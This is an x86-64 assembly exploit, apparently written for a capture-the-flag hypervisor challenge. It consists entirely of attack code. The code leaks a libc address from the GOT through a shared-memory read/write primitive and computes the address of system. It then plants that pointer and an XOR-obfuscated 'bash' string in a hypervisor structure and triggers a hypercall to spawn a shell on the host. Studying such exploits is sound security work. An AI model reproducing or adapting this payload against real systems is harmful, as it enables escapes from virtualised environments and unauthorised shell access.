[BITS 64]

section .text
global _start
_start:

mov rdi, 0x602290 ; getpwnam_got
mov rsi, [0x603360] ; hv_kernel_shm
add rsi, 0x1000 ; random_place
call read_write_8

mov rsi, [0x603360] ; hv_kernel_shm
add rsi, 0x1000 ; random_place
mov rax, [rsi]
call xor_fix
sub rax, 0xbf980 ; libc_base
add rax, 0x46640 ; system
call xor_fix

push rax
mov rdi, rsp
mov rsi, 0x100000038 ; things + 0x10
call read_write_8

lea rdi, [rel command]
mov rsi, 0x100000028 ; things
call read_write_8

mov rdi, 88 ; call_thing
xor rsi, rsi
lea rdx, [rel trigger_args]
call hypercall

call say_hello
int3

read_write_8:
  push rdi
  push rsi

  mov rdi, [0x60338C] ; hv_kernel_semid
  xor esi, esi
  call sem_increment

  pop rsi
  pop rdi
  mov rdx, 8
  call do_encrypt

  mov rdi, 1
  call sleep

  mov rdi, [0x60338C] ; hv_kernel_semid
  xor esi, esi
  call sem_decrement

  ret

sem_decrement:
  mov eax, 0x4015D0
  jmp rax
sem_increment:
  mov eax, 0x401600
  jmp rax
do_encrypt:
  mov eax, 0x402380
  jmp rax
hypercall:
  mov eax, 0x4016F0
  jmp rax
sleep:
  mov eax, 0x400D00
  jmp rax
write:
  mov eax, 1
  syscall
  ret

say_hello:
  mov rdi, 1
  lea rsi, [rel hello]
  mov rdx, 6
  call write
  ret

xor_fix:
  mov rbx, 0x7473656c72616863
  xor rax, rbx
  ret

hello:
  db 'hello',0xa

command:
  dq 0x7473656c1a120901 ; xored bash

trigger_args:
  dw 0x6162 ; ba